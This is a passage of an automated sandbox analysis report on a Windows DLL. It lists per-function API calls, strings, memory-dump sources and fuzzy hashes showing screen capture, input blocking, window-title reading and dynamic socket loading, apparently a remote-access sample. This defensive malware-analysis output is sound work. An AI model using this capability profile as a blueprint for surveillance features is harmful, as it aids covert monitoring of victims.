                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateDirectoryFileFreeHandleLocalSystemlstrcat
                                                          • String ID: p
                                                          • API String ID: 3845662661-2181537457
                                                          • Opcode ID: 14b9efa5483a32bc41595b6595029f4fa2cd9a01486b53e31f71f9e7ac383b4f
                                                          • Instruction ID: 0d636d5cf498f0e200fc51c94bb837cf85bd2e6de4a3745d098e481c266d8e14
                                                          • Opcode Fuzzy Hash: 14b9efa5483a32bc41595b6595029f4fa2cd9a01486b53e31f71f9e7ac383b4f
                                                          • Instruction Fuzzy Hash: 10018074504301ABE720DF28DC89BDB77E4BB88714F448E1CF299961D0D7B8A548CBA2
                                                          Function 1000BB20 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39librarystringloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(user32.dll), ref: 1000BB2D
                                                          • GetProcAddress.KERNEL32(00000000,GetWindowTextA), ref: 1000BB3B
                                                          • strstr.MSVCRT ref: 1000BB74
                                                          • FreeLibrary.KERNEL32(00000000), ref: 1000BB90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressFreeLoadProcstrstr
                                                          • String ID: GetWindowTextA$user32.dll
                                                          • API String ID: 1147820842-647680576
                                                          • Opcode ID: 42b4113caa3ec96d38a59490f1ca3cf002b8f7a7bca17497b91e9fe249d7a835
                                                          • Instruction ID: 01f9adafe10d49ab8bc32e9ede4b268ea2dd08531be522d4a9e00c30d8564b2e
                                                          • Opcode Fuzzy Hash: 42b4113caa3ec96d38a59490f1ca3cf002b8f7a7bca17497b91e9fe249d7a835
                                                          • Instruction Fuzzy Hash: 74F0C8395012106BF3219B28CCC4BEB7BE8FF84341F044924F94996254DBB99549C6A1
                                                          Function 1000EA00 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemMetrics.USER32(00000000), ref: 1000EA0F
                                                          • GetSystemMetrics.USER32(00000001), ref: 1000EA13
                                                          • ChangeDisplaySettingsA.USER32 ref: 1000EA49
                                                          • ChangeDisplaySettingsA.USER32(?,00000001), ref: 1000EA56
                                                          • ChangeDisplaySettingsA.USER32(00000000,00000000), ref: 1000EA66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ChangeDisplaySettings$MetricsSystem
                                                          • String ID:
                                                          • API String ID: 840903655-3916222277
                                                          • Opcode ID: da8bcf99ab6d6381277834236ee77cd44cb5ccb353c2679cf74ed6f1b0556459
                                                          • Instruction ID: 9ef3ec576e7027de0717f9877b67978966fede7fd05d5f4f5218d1c1f9d83b39
                                                          • Opcode Fuzzy Hash: da8bcf99ab6d6381277834236ee77cd44cb5ccb353c2679cf74ed6f1b0556459
                                                          • Instruction Fuzzy Hash: F3F03A31A58324AAF720DB748D45F9B7AE4BF44B48F44091DB6589A1D0E7F5A4088F93
                                                          Function 100125D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 10012560: EnterCriticalSection.KERNEL32(?,?,?,1001246B,?,00000001,?,?,?,00000000,100988A8,000000FF,1000EB8A), ref: 1001256B
                                                            • Part of subcall function 10012560: LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,100988A8,000000FF,1000EB8A), ref: 10012585
                                                          • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 100125F6
                                                          • GetProcAddress.KERNEL32(00000000,closesocket), ref: 10012604
                                                          • FreeLibrary.KERNEL32(00000000), ref: 10012619
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalLibrarySection$AddressEnterFreeLeaveLoadProc
                                                          • String ID: 5$closesocket$ws2_32.dll
                                                          • API String ID: 2819327233-1779900740
                                                          • Opcode ID: 27ca07e9f078f202f3a329561812890b0cb509a05fc093fdfdbdbb04bf2e6fa4
                                                          • Instruction ID: 2761632c92e94d1a980d48baebd45236be465951dd9527d8c45c8e1131a91282
                                                          • Opcode Fuzzy Hash: 27ca07e9f078f202f3a329561812890b0cb509a05fc093fdfdbdbb04bf2e6fa4
                                                          • Instruction Fuzzy Hash: 83F0A77A100A116BD301EF1C9C84DDB77A8FF84752F440519FE4496201DB34E919C7B2
                                                          Function 100246B0 Relevance: 10.2, APIs: 8, Instructions: 199sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$atoi$CloseHandle
                                                          • String ID:
                                                          • API String ID: 3951340052-0
                                                          • Opcode ID: a3dae96142abd2ad21c9e791e016f87c3cb7eca048d36a150d9ec5762a61b45e
                                                          • Instruction ID: d7a51b80122ffeeab1abcf823611aaaec88fa79b16853a0ade1e46a9717f9ac6
                                                          • Opcode Fuzzy Hash: a3dae96142abd2ad21c9e791e016f87c3cb7eca048d36a150d9ec5762a61b45e
                                                          • Instruction Fuzzy Hash: 0341E73B31416016C554F729BC41FBFA754FBE5722F81442FF1869A281CE206C9B83B9
                                                          Function 10018570 Relevance: 9.1, APIs: 6, Instructions: 129windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDIBSection.GDI32(?,00000000,00000000,77045D50,00000000,00000000), ref: 100185E1
                                                          • SelectObject.GDI32(00000000,00000000), ref: 100185EF
                                                          • BitBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 1001860E
                                                          • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00CC0020), ref: 1001862F
                                                          • DeleteObject.GDI32(?), ref: 10018685
                                                          • free.MSVCRT ref: 10018694
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Object$CreateDeleteSectionSelectfree
                                                          • String ID:
                                                          • API String ID: 2595996717-0
                                                          • Opcode ID: ee283649881eec98d8cbad5e7b64363b03abddda214ff71c648d186bcbc73e34
                                                          • Instruction ID: fa73614132ced6616fd7bc227f346a67f57bb193df799f847b61321046b9127f
                                                          • Opcode Fuzzy Hash: ee283649881eec98d8cbad5e7b64363b03abddda214ff71c648d186bcbc73e34
                                                          • Instruction Fuzzy Hash: E34126B5600705AFD714DF68CC84E6BB7EAFB88600F14891DF98A8B390D670EE458B61
                                                          Function 100168D0 Relevance: 9.1, APIs: 6, Instructions: 121keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • BlockInput.USER32(00000000), ref: 10016966
                                                          • BlockInput.USER32(?,?,?), ref: 10016989
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 100169A0
                                                          • BlockInput.USER32(?,?,?), ref: 100169A9
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 100169C0
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 100169D9
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: BlockExchangeInputInterlocked
                                                          • String ID:
                                                          • API String ID: 3466551546-0
                                                          • Opcode ID: 7274aee29f7d4d2a2de31e6c4e64948058b118fdd37ba114e8c6fc55ca8315a3
                                                          • Instruction ID: bf2dd9b5654f157943e35733b8f3b73f0b93b8599c458bfd2c4311f32437dab4
                                                          • Opcode Fuzzy Hash: 7274aee29f7d4d2a2de31e6c4e64948058b118fdd37ba114e8c6fc55ca8315a3
                                                          • Instruction Fuzzy Hash: 3D31E33B30856157D284E738BC61EEFA755FFD9320B05892BF585DA241CA20E89683B0
                                                          Function 100244C0 Relevance: 9.1, APIs: 6, Instructions: 118stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: malloc$realloc$strstr
                                                          • String ID:
                                                          • API String ID: 686937093-0
                                                          • Opcode ID: 6c6eb5024497b7099948d6fa03faf251760030852925ab041fa65ee9e74f37cf
                                                          • Instruction ID: 77dd24013c4c70d5dbbb406fc0c88ef9f28fbba95e417396a5267408fea13c55
                                                          • Opcode Fuzzy Hash: 6c6eb5024497b7099948d6fa03faf251760030852925ab041fa65ee9e74f37cf
                                                          • Instruction Fuzzy Hash: AA3157366006114FC304CF3CAC8026AFBE5EBC9666F44067DEA89C3391DE75DD0A87A1
                                                          Function 10018880 Relevance: 9.1, APIs: 6, Instructions: 105windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #823.MFC42(?,00000058,00000000,00000000,0000005C,00000000,10017EFB,?,?,?,?,?,?,00000000), ref: 100188AB
                                                          • GetDC.USER32(00000000), ref: 10018906
                                                          • CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 10018913
                                                          • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10018926
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 1001892F
                                                          • DeleteObject.GDI32(00000000), ref: 10018936
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823BitmapBitsCompatibleCreateDeleteObjectRelease
                                                          • String ID:
                                                          • API String ID: 1489246511-0
                                                          • Opcode ID: 232e81e2328815f38dc1846d181fe650c2457a96f065839fb43a6e4f516f74b8
                                                          • Instruction ID: c876030701d45069bbaf201adcf95ae34e10d61091fae5aa7b66ba3b571a8907
                                                          • Opcode Fuzzy Hash: 232e81e2328815f38dc1846d181fe650c2457a96f065839fb43a6e4f516f74b8
                                                          • Instruction Fuzzy Hash: 8D31C6716057018FD324CF69CCC4B66FBE6FF95308F188A6DE5498B291D770A649CB50
                                                          Function 100190D0 Relevance: 9.1, APIs: 6, Instructions: 105windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #823.MFC42(?,0000005C,00000000,00000000,00000060,00000000,10018C0A,?,?,00000001), ref: 100190FB
                                                          • GetDC.USER32(00000000), ref: 10019156
                                                          • CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 10019163
                                                          • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10019176
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 1001917F
                                                          • DeleteObject.GDI32(00000000), ref: 10019186
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823BitmapBitsCompatibleCreateDeleteObjectRelease
                                                          • String ID:
                                                          • API String ID: 1489246511-0
                                                          • Opcode ID: 03719f9758a2d591c926ce4265d16c4aa9b88d838764e5f7700e274da321e404
                                                          • Instruction ID: ef3514cd601d8d145b1532123b0b9183357df65c168f27f3a63bee1d8f630a14
                                                          • Opcode Fuzzy Hash: 03719f9758a2d591c926ce4265d16c4aa9b88d838764e5f7700e274da321e404
                                                          • Instruction Fuzzy Hash: 9631F3712057029FD324CF69CC88B5BFBE6FF89344F188A6DE5498B291E770A549CB90
                                                          Function 10003040 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 101stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: strncmp
                                                          • String ID: false$null$true
                                                          • API String ID: 1114863663-2913297407
                                                          • Opcode ID: cdbdc36268714888663b28bbe182531708683dd6fabd3d740ca363935316f6e3
                                                          • Instruction ID: 00cf7c64ec7db015d10f7af15bebca5fd974838d1259f6499305d769b8ebe985
                                                          • Opcode Fuzzy Hash: cdbdc36268714888663b28bbe182531708683dd6fabd3d740ca363935316f6e3
                                                          • Instruction Fuzzy Hash: 2521B77A6052156AE311DB19FC41ACB77DCDFC52B0F06C42AF54886209E334E9878B91
                                                          Function 100084B0 Relevance: 9.1, APIs: 6, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 10008505
                                                          • #825.MFC42(?,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 1000850C
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 10008539
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 1000854C
                                                          • #825.MFC42(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 1000859A
                                                          • #825.MFC42(?,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 100085BD
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #825$CloseHandle$D@2@@std@@D@std@@Tidy@?$basic_string@U?$char_traits@V?$allocator@
                                                          • String ID:
                                                          • API String ID: 2070391518-0
                                                          • Opcode ID: 7d5be02d86cc8920d62cf2d17b5541d9373f0ddaeac744c5cd82ef4eaf4a695e
                                                          • Instruction ID: 37eccab93eae1f9570d16d686a1212c04e0715a42fba5b1868afdc0cba55ac79
                                                          • Opcode Fuzzy Hash: 7d5be02d86cc8920d62cf2d17b5541d9373f0ddaeac744c5cd82ef4eaf4a695e
                                                          • Instruction Fuzzy Hash: 1241ACB5600B058FD704CF68C881B96F7E4FF49750F004A2DE6AA87381EB70BA54CB81
                                                          Function 10009A60 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z.MSVCP60(?,?,?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009AAA
                                                          • ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z.MSVCP60(?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009ABB
                                                          • ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z.MSVCP60(?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009ACC
                                                          • #825.MFC42(?,?,?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009AF5
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009B2A
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009B3D
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
